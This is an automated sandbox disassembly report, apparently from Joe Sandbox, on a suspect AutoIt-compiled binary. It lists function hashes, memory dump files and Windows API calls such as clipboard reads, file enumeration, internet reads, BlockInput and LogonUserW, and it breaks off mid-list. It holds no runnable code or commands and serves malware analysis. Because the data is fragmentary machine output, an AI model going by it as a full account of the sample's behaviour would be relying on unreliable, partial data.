                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                        • String ID:
                                                                                        • API String ID: 15083398-0
                                                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: U$\
                                                                                        • API String ID: 4104443479-100911408
                                                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: 8ec4b7a3981feef6b7ee127dd1057797315d3288f824c92c24242a8404effa4d
                                                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                        • Opcode Fuzzy Hash: 8ec4b7a3981feef6b7ee127dd1057797315d3288f824c92c24242a8404effa4d
                                                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 901099227-0
                                                                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                        APIs
                                                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Proc
                                                                                        • String ID:
                                                                                        • API String ID: 2346855178-0
                                                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: N@
                                                                                        • API String ID: 0-1509896676
                                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
